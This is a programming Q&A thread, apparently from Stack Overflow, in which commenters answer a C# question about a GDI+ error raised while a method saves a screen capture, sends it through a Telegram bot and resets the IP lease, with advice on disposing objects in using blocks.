# why im getting im getting this gdi error?

Tags: c#, generics, bitmap, gdi+

hello im getting "a generic error occurred in GDI+." in this method

```
        public async void Disconnect()
    {
        using (Bitmap bitmap = new Bitmap(Screen.PrimaryScreen.Bounds.Width, Screen.PrimaryScreen.Bounds.Height))
        {
            Graphics graphics = Graphics.FromImage(bitmap as Image);
            graphics.CopyFromScreen(0, 0, 0, 0, bitmap.Size);
            bitmap.Save(dcSS);
        }

        using (Stream stream = System.IO.File.OpenRead(dcSS))
        {
            await Bot.SendPhotoAsync(teleChatId, stream, "Timer Ended " + DateTime.Now);
        }

        Ipconfig("/release");

        Thread.Sleep(5000);

        Ipconfig("/renew");

        timer.Reset();
    }
```

in the line "bitmap.Save("test.gif");", i dont know what else to try i tried dispose, deleting the image before saving.. but i keep getting it, what is strange, is that this code will run once, if i close and reopen the program it will work only 1 time, after the first time i will get this error

edit: updated code still not working

Comment: Put everything in `using` blocks. The Graphics object and the Stream. The latter most of all. The Process should be diposed of, too (any disposable object you create, actually). Also, you know that GDI+ can't create GIF images, right? You'll end up with a PNG (the default, since you haven't specified a format). + That `async void` can be a trouble-maker. You should avoid it

Comment: To overwrite an image you just have opened you need to let go of all handles to it. The best way is putting all references into using clauses!

Comment: im still getting the error, after closing everything into using!.. dunno what the hell is going on,, and i have to use await, because thats a method that cut the internet, but before that, it have to send an screenshot using internet.

Comment: Post the code you're using now, then. If you had done it correctly, it'ld work as intended. No idea why you're resetting the DHCP lease.

Comment: i updated the code on the main post. check it

Comment: **Put everything in `using` blocks. The Graphics object and the Stream**:  `using (Graphics graphics = Graphics.FromImage(bitmap as Image)) { ... }`. Every disposable object needs to be disposed of. The reason why this is important becomes immediately evident in an async procedure. If an object has a `Dispose()` method, you need to dispose of it. Explicitly, calling `Dispose()` or implicitly, enclosing the declaration in `using` blocks. You cannot miss this.